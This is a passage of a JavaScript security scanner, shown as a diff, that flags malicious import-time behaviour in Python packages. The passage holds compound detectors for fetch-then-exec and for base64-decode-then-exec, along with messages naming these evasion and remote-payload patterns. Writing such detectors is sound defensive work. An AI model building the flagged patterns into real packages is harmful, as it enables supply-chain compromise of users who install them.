message: `${relPath}: __import__() with hardcoded dangerous module name (subprocess/os/requests/urllib/socket/...) — obfuscation pattern to evade static analysis.`,
|
|
278
|
+
file: relPath
|
|
279
|
+
});
|
|
280
|
+
}
|
|
281
|
+
|
|
282
|
+
// 4. Compound detectors (in addition to individual fires).
|
|
283
|
+
if (hasFetch && hasExec) {
|
|
284
|
+
threats.push({
|
|
285
|
+
type: 'import_time_fetch_exec',
|
|
286
|
+
severity: 'CRITICAL',
|
|
287
|
+
message: `${relPath}: network fetch (urllib/requests/http.client/httpx/aiohttp) AND exec/eval in same file — TrapDoor-style remote-payload-then-RCE.`,
|
|
288
|
+
file: relPath
|
|
289
|
+
});
|
|
290
|
+
}
|
|
291
|
+
if (hasBase64 && hasExec) {
|
|
292
|
+
threats.push({
|
|
293
|
+
type: 'import_time_base64_exec',
|
|
294
|
+
severity: 'CRITICAL',
|
|
295
|
+
message: `${relPath}: base64/codecs decode AND exec/eval in same file — obfuscated payload execution pattern.`,
|
|
296
|
+
file: relPath
|
|
297
|
+
});
|
|
298
|
+
}
|
|
299
|
+
}
|
|
300
|
+
|
|
301
|
+
return threats;
|
|
302
|
+
}
|
|
303
|
+
|
|
304
|
+
module.exports = {
|
|
305
|
+
scanPythonSource,
|
|
306
|
+
// Exported for unit testing of the helpers in isolation.
|
|
307
|
+
_internal: {
|
|
308
|
+
findTargetPythonFiles,
|
|
309
|
+
stripPythonComments,
|
|
310
|
+
stripTripleQuotedStrings,
|
|
311
|
+
detectImportTimeExec,
|
|
312
|
+
detectImportTimeSubprocess,
|
|
313
|
+
detectImportTimeOsSystem,
|
|
314
|
+
detectNetworkFetch,
|
|
315
|
+
detectBase64Decode,
|
|
316
|
+
detectDeserialization,
|
|
317
|
+
detectDynamicDangerousImport
|
|
318
|
+
}
|
|
319
|
+
};
|